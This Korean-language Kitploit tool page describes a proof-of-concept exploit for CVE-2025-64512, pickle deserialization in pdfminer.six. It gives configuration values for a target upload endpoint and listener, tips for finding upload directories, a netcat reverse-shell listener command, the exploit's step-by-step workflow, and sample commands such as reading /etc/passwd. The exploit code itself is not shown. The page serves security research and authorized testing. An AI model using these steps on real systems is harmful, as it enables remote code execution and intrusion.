Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-64512 — CVE-2025-64512에 대한 익스플로잇으로 리버스 셸을 획득합니다. | Kitploit
도구/GitHubGitHub/stoic-crawler/cve-2025-64512
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubstoic-crawler/cve-2025-64512

CVE-2025-64512

CVE-2025-64512에 대한 익스플로잇으로 리버스 셸을 획득합니다.

저장소 보기
11개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-64512 – pdfminer.six 역직렬화 PoC

개요

이 개념 증명은 pdfminer.six (CVE-2025-64512)의 취약점을 시연하며, 악성 PDF가 처리될 때 임의의 명령 실행으로 이어질 수 있습니다. 이 익스플로잇은 악성의 gzip 압축 Python pickle을 참조하는 조작된 PDF를 사용합니다. 취약한 애플리케이션이 PDF를 파싱하면 pickle을 로드하고 포함된 페이로드를 실행합니다.

포함된 PoC는 Python 리버스 셸을 실행하도록 구성되어 있지만, 페이로드는 어떤 명령으로든 대체할 수 있습니다.


요구 사항

  • Python 3
  • requests

필요한 종속성 설치:

root@kitploit:~
pip install requests

구성

익스플로잇을 실행하기 전에 exploit.py의 구성 섹션을 편집하세요:

root@kitploit:~
BASE_URL = ""
UPLOAD_DIR = ""
LHOST = ""
LPORT = 4444

BASE_URL

취약한 업로드 엔드포인트의 URL입니다.

예시:

root@kitploit:~
BASE_URL = "http://target/upload.php"

익스플로잇은 악성 PDF와 압축된 pickle을 모두 이 엔드포인트에 업로드합니다.


UPLOAD_DIR

업로드된 파일이 저장되는 대상의 절대 디렉터리입니다.

예시:

root@kitploit:~
UPLOAD_DIR = "/var/www/html/uploads"

이 경로는 생성된 PDF 내에 포함되며, 취약한 애플리케이션이 나중에 업로드된 pickle을 읽을 위치와 일치해야 합니다.

업로드 디렉터리를 알 수 없는 경우, 열거 중에 확인하세요. 애플리케이션에 따라 유용한 기술은 다음과 같습니다:

  • 애플리케이션 소스 코드 검토 (가능한 경우)
  • 오류 메시지 또는 스택 추적 검사
  • 구성 파일 찾기
  • 업로드된 파일이 제공되는 위치 식별
  • 예측 가능한 업로드 위치 열거
  • 적절한 경우 가능성 있는 업로드 경로 퍼징

일반적인 위치는 다음과 같습니다:

root@kitploit:~
/var/www/html/uploads
/var/www/uploads
/srv/www/uploads
/opt/application/uploads

올바른 디렉터리는 전적으로 대상 애플리케이션에 따라 달라집니다.


LHOST

리스너 IP 주소입니다.

예시:

root@kitploit:~
LHOST = "10.10.14.5"

LPORT

리버스 셸의 리스닝 포트입니다.

예시:

root@kitploit:~
LPORT = 4444

익스플로잇을 실행하기 전에 리스너를 시작하세요:

root@kitploit:~
nc -lvnp 4444

사용법

익스플로잇 실행:

root@kitploit:~
python3 exploit.py

스크립트는 다음을 수행합니다:

  1. 악성 pickle을 생성합니다.
  2. 이를 evil.pickle.gz로 압축합니다.
  3. 해당 pickle을 참조하는 악성 PDF를 생성합니다.
  4. 두 파일을 업로드합니다.
  5. PDF 처리를 트리거합니다.
  6. 대상이 취약한 경우 페이로드를 실행합니다.

사용자 정의 페이로드

리버스 셸 대신, 전달되는 명령을 수정하여 모든 운영 체제 명령을 실행할 수 있습니다:

root@kitploit:~
create_pickle_with_cmd(command)

예시는 다음과 같습니다:

root@kitploit:~
id
whoami
uname -a
cat /etc/passwd

참고 사항

  • 취약한 애플리케이션은 취약한 버전의 pdfminer.six를 사용하여 업로드된 PDF를 처리해야 합니다.
  • 업로드된 pickle은 조작된 PDF에서 참조된 경로에 계속 접근 가능해야 합니다.
  • 성공적인 익스플로잇은 대상의 처리 워크플로우와 파일 저장소 레이아웃에 따라 달라집니다.

면책 조항

이 개념 증명은 교육 목적, 보안 연구 및 승인된 침투 테스트를 위해서만 제공됩니다. 보안 테스트를 수행할 명시적 권한이 있는 시스템에 대해서만 사용하십시오.

도구 다운로드